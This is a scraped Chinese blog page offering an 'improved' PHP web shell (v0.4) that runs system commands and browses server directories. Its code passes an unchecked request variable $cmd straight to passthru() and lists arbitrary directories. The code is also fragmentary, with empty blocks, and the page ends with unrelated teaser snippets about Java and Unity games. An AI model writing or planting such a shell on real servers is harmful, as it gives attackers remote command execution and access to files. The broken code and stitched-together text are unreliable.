PHP Shell的編寫(改進版)

2021-09-30 02:56:59 字數 688 閱讀 1340

php shell的編寫(改進版)

以前寫過乙個沒有任何技術含量的php cmd shell,總是覺得功能很弱,並且對一些問題沒有處理好,比如瀏覽目錄等,後來深入學習php 後,發現了很多有趣的函式個,於是重新簡單的編寫了乙個新的php shell,希望大家喜歡!

程式介紹:

程式:php web shell

版本:v0.4

功能:1.可以支援目前主流的作業系統: win32/*nix/*bsd

2.執行系統命令/程式

3.瀏覽目錄

程式**:

php web shellv0.4

適用系統:win32/linux/unix/bsd

<?php

if(!empty($cmd)) 

if(!empty($dir)) 

?>

<?php

if(empty($cmd) && empty($dir)) 

@passthru($cmd); //利用passthru()函式來執行獲取的命令(變數),php中相似的函式還有system(), popen(),exec()等

$f = @opendir($dir);  //利用opendir()函式來獲取目錄資訊賦值給變數

while($file = @readdir($f)) 

?>

PHPShell的編寫(改進版)

程式介紹 程式 phpwebshell 版本 v0.4 功能 1.可以支援目前主流的作業系統 win32 nix bsd 2.執行系統命令 程式 3.瀏覽目錄 程式 phpwebshellv0.4 適用系統 win32 linux unix bsd if empty cmd if empty dir...

Beetle遊戲改進版

在執行這個遊戲時,最後螢幕上顯示的是如下圖所示。甲蟲情況變成了beetle 60aeb0。原來在system.out.println beetle 中實際上用到了tostring方法,為了清楚表達甲蟲的情況,要重寫這一方法。在beetle類中加入下面重寫的tosting 方法 public stri...

六 改進版(Hit UFO)

2 實現 專案位址 參考部落格 按 adapter模式 設計圖修改飛碟遊戲 使它同時支援物理運動與運動學 變換 運動 飛碟起始位置隨機生成 vector3 startpos new vector3 unityengine.random.range 70,70 unityengine.random.r...